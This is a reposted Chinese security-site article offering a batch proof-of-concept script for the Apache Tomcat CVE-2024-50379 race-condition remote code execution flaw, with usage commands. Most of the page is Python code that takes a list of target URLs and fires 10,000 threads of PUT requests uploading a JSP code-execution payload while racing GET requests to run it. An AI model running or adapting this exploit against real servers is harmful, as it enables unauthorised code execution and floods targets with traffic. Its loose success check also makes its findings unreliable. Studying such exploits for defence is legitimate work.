Apache Tomcat(CVE-2024-50379)条件竞争致远程代码执行漏洞批量检测脚本

admin
admin
admin
137432
文章
113
评论
2024年12月23日14:32:45评论14 views字数 2453阅读8分10秒阅读模式
0x01 工具介绍

Apache Tomcat(CVE-2024-50379)条件竞争致远程代码执行漏洞批量检测脚本。

0x02 安装与使用

一、批量检测:

python poc.py -f url.txt

二、单个检测:

python poc.py -u your-ip

Apache Tomcat(CVE-2024-50379)条件竞争致远程代码执行漏洞批量检测脚本

0x03 POC
import requests
import urllib3
from urllib.parse import urljoin
import argparse
import ssl
import concurrent.futures

ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def read_file(file_path):
    with open(file_path, 'r') as file:
        urls = file.read().splitlines()
    return urls

def check(url):
    protocols = ['http://', 'https://']
    found_vulnerabilities = False

    for protocol in protocols:
        target_url = urljoin(protocol + url.lstrip('http://').lstrip('https://'), "/")
        print(f"Checking {target_url}...")

        target_url_put1 = urljoin(target_url, "/aa.Jsp")
        target_url_put2 = urljoin(target_url, "/bb.Jsp")
        target_url_get1 = urljoin(target_url, "/aa.jsp")
        target_url_get2 = urljoin(target_url, "/bb.jsp")

        headers1 = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
            "Content-Type": "application/json"
        }

        headers2 = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
        }
        payload_put = "aa<% Runtime.getRuntime().exec(\"calc.exe\");%>"

        #增加线程
        with concurrent.futures.ThreadPoolExecutor(max_workers=10000) as executor:
            futures = []
            # 循环执行10000次
            for _ in range(10000):  
                futures.append(executor.submit(requests.put, target_url_put1, verify=False, headers=headers1, data=payload_put))
                futures.append(executor.submit(requests.put, target_url_put2, verify=False, headers=headers1, data=payload_put))
                futures.append(executor.submit(requests.get, target_url_get1, verify=False, headers=headers2))
                futures.append(executor.submit(requests.get, target_url_get2, verify=False, headers=headers2))

            for future in concurrent.futures.as_completed(futures):
                try:
                    response = future.result()
                    print(f"Response status: {response.status_code}")
                    if isinstance(response, requests.Response):
                        if (response.status_code == 201) or (response.status_code == 200):
                            found_vulnerabilities = True
                except Exception as e:
                    print(f"Error occurred: {e}")

            if found_vulnerabilities:
                print(f"\033[31mFind: {url}: Apache Tomcat CVE-2024-50379 Conditional Competition To RCE!\033[0m")
                return True

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL")
    parser.add_argument("-f", "--txt", help="file")
    args = parser.parse_args()
    url = args.url
    txt = args.txt
    if url:
        check(url)
    elif txt:
        urls = read_file(txt)
        for url in urls:
            check(url)
    else:
        print("help")

原文始发于微信公众号(Web安全工具库):Apache Tomcat(CVE-2024-50379)条件竞争致远程代码执行漏洞批量检测脚本

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月23日14:32:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache Tomcat(CVE-2024-50379)条件竞争致远程代码执行漏洞批量检测脚本http://cn-sec.com/archives/3535613.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息